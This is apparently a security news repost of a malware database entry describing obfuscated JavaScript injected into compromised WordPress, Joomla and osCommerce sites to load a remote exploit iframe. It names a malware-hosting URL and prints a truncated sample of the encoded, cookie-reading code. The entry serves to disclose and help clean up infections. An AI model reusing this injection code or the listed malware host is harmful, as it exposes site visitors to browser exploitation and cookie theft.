Malware entry: MW:JS:DE921

Description:

A malicious and encoded javascript was found. It used multiple encoding methods to hide a remote iframe include from a compromised web site. All in attempt to exploit the browser of anyone visiting the site.

Note that in this case the javascript files get compromised with the malicious code.

Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.

Clean up: You can also sign up with us and let our team remove the malware for you.

Loads malware from multiple sources:

http://adimgsn10.co.in/smb

Malware dump (sample of malware):

var l_lpM="\x75\x73\x65ri\x64A0\x3817FB2\x35";var<br /> ptwoAN8="25″;var Or5PDn=1;var OE4nLI;function B_UkA(OIAQ5_){var MaEb1=document.cookie;if(!MaEb1){return<br /> null;}MaEb1=MaEb1.replace(/\s/g,””);var U…

More information: Malware entry: MW:JS:DE921

Story added 22. March 2012, content source with full text you can find at link above.

Malware entry: MW:JS:DE921

More antivirus and malware news?

Ads

Security news

Malware

Security

IT security

About site

Search Terms Tips

Recent New Tips

Recent Posts